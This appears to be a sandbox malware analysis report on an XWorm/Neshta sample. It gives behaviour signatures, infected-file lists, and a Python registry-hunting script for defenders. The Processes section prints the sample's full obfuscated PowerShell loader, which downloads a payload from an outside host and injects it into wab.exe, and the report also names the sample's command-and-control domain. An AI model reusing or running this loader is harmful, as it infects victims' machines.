Malware Analysis Report

2024-09-11 03:12

Sample ID 240521-edagnsge28
Target 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded
SHA256 a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336
Tags
neshta xworm persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336

Threat Level: Known bad

The file 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded was found to be: Known bad.

Analyst summary (from the behavioral2 run below): the executable writes a VBScript to %TEMP% (xmwugm.vbs), drops a shortcut to itself in the user's Startup folder, and runs the script with WScript.exe. The VBScript starts a 64-bit powershell.exe with a heavily obfuscated loader whose strings are recovered at runtime by a routine (alcoholist) that keeps every sixth character of a junk-padded literal, and whose Compulsed function is Invoke-Expression. Among the recovered strings are a browser-style User-Agent header and the download URL https://de.healthandwellnessblog.za.com/cv/Tjenes.rar, which matches the HTTPS connection in the Network table. The loader then re-executes itself in 32-bit PowerShell (SysWOW64) and, via WriteProcessMemory and SetThreadContext, runs the payload inside C:\Program Files (x86)\windows mail\wab.exe, hiding its threads from debuggers along the way (NtSetInformationThread and NtCreateThreadEx with HideFromDebugger). The code running in wab.exe exhibits the Neshta file infector (drops C:\Windows\svchost.com, points the exefile\shell\open\command association at it, and opens dozens of executables under Program Files for modification) and adds a Run value, "Startup key", that executes a script stored in HKCU\ledelsessystemets\Hovedstillingers through a command placed in the environment variable %Nonharmoniousness171% (its value is not captured in this report). The TCP session to mayxw9402.duckdns.org:9402 is consistent with the XWorm detection and is the likely command-and-control channel.

Malicious Activity Summary

neshta xworm persistence rat spyware trojan

Xworm

Xworm family

Neshta

Detect Xworm Payload

Blocklisted process makes network request

Modifies system executable filetype association

Drops startup file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-21 03:48

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 03:48

Reported

2024-05-21 03:51

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Neshta

persistence spyware neshta

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\\ledelsessystemets\\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)" C:\Windows\SysWOW64\reg.exe N/A
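
The two registry changes recorded above (the exefile handler hijack under "Modifies system executable filetype association" and this Run value) can be hunted for on other hosts by parsing reg query output. The following Python is an added example written for this page, not part of the sandbox report; the sample reg query text inside it is constructed to mirror the two indicators above plus one benign Run value, and the trait patterns are ours.

```python
"""Hunt for the two persistence mechanisms recorded in this report.

Added example for this page, not sandbox output. It parses the text format
that `reg query <key> /s` prints (a key line, then one line per value with
the name, type and data columns separated by runs of spaces), so the same
functions run unchanged on output collected from a live host.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegValue:
    key: str
    name: str
    vtype: str
    data: str


# "    <value name>    REG_TYPE    <data>"; value names may contain spaces.
_VALUE_RE = re.compile(r"^\s{2,}(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text: str) -> list[RegValue]:
    """Turn reg query output into RegValue records."""
    values: list[RegValue] = []
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key:
            m = _VALUE_RE.match(line)
            if m:
                values.append(RegValue(key, m.group(1), m.group(2), m.group(3).strip()))
    return values


# Windows' default handler for launching an .exe: the file itself, with its arguments.
EXEFILE_DEFAULT = '"%1" %*'


def hijacked_exe_handlers(values: list[RegValue]) -> list[RegValue]:
    """Neshta prepends C:\\Windows\\svchost.com so every .exe launch runs it first."""
    return [
        v for v in values
        if v.key.lower().endswith(r"\classes\exefile\shell\open\command")
        and v.name == "(Default)"
        and v.data != EXEFILE_DEFAULT
    ]


# Traits of the Run value this sample writes. Each alone is weak; together they
# describe a registry-resident script re-launched through a hidden interpreter.
_RUN_TRAITS = (
    re.compile(r"^%[^%]+%"),                               # launcher hidden in an env var
    re.compile(r"(?i)-w(?:indowstyle)?\s+(?:1|hidden)"),   # hidden window
    re.compile(r"(?i)get-itemproperty\s+-path\s+'HKCU:"),  # body read from another key
)


def suspicious_run_values(values: list[RegValue], min_traits: int = 2) -> list[tuple[RegValue, int]]:
    """Return (value, trait count) for Run entries matching at least min_traits patterns."""
    hits = []
    for v in values:
        if not v.key.lower().endswith(r"\currentversion\run"):
            continue
        score = sum(1 for pattern in _RUN_TRAITS if pattern.search(v.data))
        if score >= min_traits:
            hits.append((v, score))
    return hits


# Constructed sample: the two indicators from this report plus one benign value.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
    (Default)    REG_SZ    C:\Windows\svchost.com "%1" %*

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Startup key    REG_EXPAND_SZ    %Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)
"""


def audit(text: str) -> dict:
    """Run both checks over one reg query dump."""
    values = parse_reg_query(text)
    return {
        "exefile_hijack": hijacked_exe_handlers(values),
        "run_values": suspicious_run_values(values),
    }


if __name__ == "__main__":
    findings = audit(SAMPLE_REG_QUERY)
    for v in findings["exefile_hijack"]:
        print(f"[!] exefile handler hijacked: {v.data}")
    for v, score in findings["run_values"]:
        print(f"[!] Run value '{v.name}' ({score}/{len(_RUN_TRAITS)} traits): {v.data[:60]}...")
```

Restoring exefile\shell\open\command to "%1" %* is only part of the cleanup: every executable Neshta has already infected re-establishes svchost.com and the association the next time it runs, so the hunt has to be followed by re-verifying the binaries under Program Files against known-good hashes. The Run value check deliberately scores traits rather than matching the random key and variable names from this sample, which change between builds.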

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1756 set thread context of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

All 64 rows of this table share Description "File opened for modification", Process C:\Program Files (x86)\windows mail\wab.exe and Target N/A; only the Indicator differs, so the indicators are listed once below. Paths are in the 8.3 short form the sandbox recorded (resolve them with dir /x on the host). A single process opening every executable under Program Files for writing is the Neshta file infector's propagation pass, so these binaries should be treated as infected until their hashes are re-verified.

Indicator
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe
C:\PROGRA~2\WINDOW~4\wmpconfig.exe
C:\PROGRA~2\WI8A19~1\ImagingDevices.exe
C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE
C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE
C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE
C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE
C:\PROGRA~2\WINDOW~2\wabmig.exe
C:\PROGRA~2\WINDOW~4\wmplayer.exe
C:\PROGRA~2\WINDOW~4\wmprph.exe
C:\PROGRA~2\WINDOW~4\wmpshare.exe
C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE
C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE
C:\PROGRA~2\WINDOW~4\wmlaunch.exe
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe
C:\PROGRA~2\INTERN~1\iexplore.exe
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE
C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe
C:\PROGRA~2\INTERN~1\ielowutil.exe
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE
C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE
C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe
C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE
C:\PROGRA~2\WINDOW~4\setup_wm.exe
C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe
C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE
C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE
C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 5064 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 3212 wrote to memory of 4428 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 4428 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4428 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3656 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 3580 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3580 wrote to memory of 4444 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4444 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. 
Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u 
rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa 
Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<script identical to the one passed to the 64-bit C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe entry above>"

The 64-bit PowerShell (PID 4428) re-runs the same script in the 32-bit host (PID 1756) because the injection target, wab.exe under Program Files (x86), is a 32-bit process; it is this second pass that performs the WriteProcessMemory and SetThreadContext injection recorded under Signatures.

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

